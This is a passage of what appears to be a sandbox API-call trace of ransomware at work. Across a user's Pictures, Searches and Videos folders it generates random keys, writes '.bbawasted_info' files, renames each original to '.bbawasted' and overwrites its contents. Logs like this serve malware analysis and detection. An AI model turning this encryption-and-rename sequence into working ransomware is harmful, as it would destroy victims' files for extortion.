returned 1 [0076.246] CryptGenRandom (in: hProv=0x5d0908, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.246] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\giMhZdZNY33v4lS3ehu.jpg.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\gimhzdzny33v4ls3ehu.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.247] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.247] SetEndOfFile (hFile=0x120) returned 1 [0076.248] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.248] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.248] lstrcpyW (in: lpString1=0x5d2a42, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\giMhZdZNY33v4lS3ehu.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\gimhzdzny33v4ls3ehu.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\giMhZdZNY33v4lS3ehu.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\gimhzdzny33v4ls3ehu.jpg.bbawasted")) returned 1 [0076.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\giMhZdZNY33v4lS3ehu.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\gimhzdzny33v4ls3ehu.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.249] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.249] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0076.250] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d2ca0 | out: pbBuffer=0x5d2ca0) returned 1 [0076.250] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.250] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0076.251] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.251] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.259] SetEndOfFile (hFile=0x120) returned 1 [0076.261] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.261] CloseHandle (hObject=0x120) returned 1 [0076.263] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0076.263] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5d0908) returned 1 [0076.263] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.264] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.264] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\VUsjvbXXlXFOjXY.bmp") returned 85 [0076.264] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b4) returned 0x5d2990 [0076.264] lstrcpyW (in: lpString1=0x5d2a3a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.264] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.264] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5d0908) returned 1 [0076.264] CryptGenRandom (in: hProv=0x5d0908, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.264] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\VUsjvbXXlXFOjXY.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\vusjvbxxlxfojxy.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.265] WriteFile (in: hFile=0x120, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.266] SetEndOfFile (hFile=0x120) returned 1 [0076.266] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.266] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.266] lstrcpyW (in: lpString1=0x5d2a3a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.266] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\VUsjvbXXlXFOjXY.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\vusjvbxxlxfojxy.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\VUsjvbXXlXFOjXY.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\vusjvbxxlxfojxy.bmp.bbawasted")) returned 1 [0076.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\VUsjvbXXlXFOjXY.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\vusjvbxxlxfojxy.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.267] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.269] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0076.270] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d2c98 | out: pbBuffer=0x5d2c98) returned 1 [0076.270] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.270] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0076.270] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.270] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.327] SetEndOfFile (hFile=0x120) returned 1 [0076.329] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.329] CloseHandle (hObject=0x120) returned 1 [0076.331] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0076.331] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5d0908) returned 1 [0076.332] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.332] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.332] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\U5_G6kjJ3vwz.gif") returned 59 [0076.332] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x280) returned 0x5d2990 [0076.332] lstrcpyW (in: lpString1=0x5d2a06, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.332] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.332] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5d0908) returned 1 [0076.333] CryptGenRandom (in: hProv=0x5d0908, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.333] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\U5_G6kjJ3vwz.gif.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\u5_g6kjj3vwz.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.333] WriteFile (in: hFile=0x120, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.334] SetEndOfFile (hFile=0x120) returned 1 [0076.335] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.335] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.335] lstrcpyW (in: lpString1=0x5d2a06, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.335] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\U5_G6kjJ3vwz.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\u5_g6kjj3vwz.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\U5_G6kjJ3vwz.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\u5_g6kjj3vwz.gif.bbawasted")) returned 1 [0076.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\U5_G6kjJ3vwz.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\u5_g6kjj3vwz.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.335] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.336] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0076.337] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.337] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.337] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0076.337] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.338] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.346] SetEndOfFile (hFile=0x120) returned 1 [0076.348] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.348] CloseHandle (hObject=0x120) returned 1 [0076.350] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0076.350] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5d0908) returned 1 [0076.351] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.351] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 63 [0076.351] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x288) returned 0x5abbd8 [0076.351] lstrcpyW (in: lpString1=0x5abc56, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.351] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.351] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5d0908) returned 1 [0076.352] CryptGenRandom (in: hProv=0x5d0908, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.352] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.353] WriteFile (in: hFile=0x120, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.353] SetEndOfFile (hFile=0x120) returned 1 [0076.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.354] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.354] lstrcpyW (in: lpString1=0x5abc56, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.bbawasted")) returned 1 [0076.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.355] GetLastError () returned 0x5 [0076.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.bbawasted")) returned 0x23 [0076.355] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.bbawasted", dwFileAttributes=0x22) returned 1 [0076.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.355] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.355] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.bbawasted", dwFileAttributes=0x23) returned 1 [0076.358] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5dd610 [0076.358] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0076.359] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.359] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.359] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0076.360] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.360] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.415] SetEndOfFile (hFile=0x120) returned 1 [0076.417] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.417] CloseHandle (hObject=0x120) returned 1 [0076.419] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5abbd8 | out: hHeap=0x580000) returned 1 [0076.419] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0076.420] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.420] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Cjv.flv") returned 49 [0076.420] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x26c) returned 0x5d0700 [0076.420] lstrcpyW (in: lpString1=0x5d0762, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.420] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.420] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0076.421] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.421] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Cjv.flv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4cjv.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.422] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.423] SetEndOfFile (hFile=0x120) returned 1 [0076.423] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.423] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.423] lstrcpyW (in: lpString1=0x5d0762, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Cjv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4cjv.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Cjv.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4cjv.flv.bbawasted")) returned 1 [0076.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Cjv.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4cjv.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.438] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.440] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0076.441] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.441] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.441] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0076.442] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.442] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.451] SetEndOfFile (hFile=0x120) returned 1 [0076.453] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.453] CloseHandle (hObject=0x120) returned 1 [0076.455] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0076.455] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0076.456] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.456] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ai ji507.mp4") returned 53 [0076.456] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x274) returned 0x5d0700 [0076.456] lstrcpyW (in: lpString1=0x5d076a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.456] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.456] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0076.457] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.457] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ai ji507.mp4.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ai ji507.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.458] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.490] SetEndOfFile (hFile=0x120) returned 1 [0076.490] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.490] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.490] lstrcpyW (in: lpString1=0x5d076a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ai ji507.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ai ji507.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ai ji507.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ai ji507.mp4.bbawasted")) returned 1 [0076.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ai ji507.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ai ji507.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.491] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, 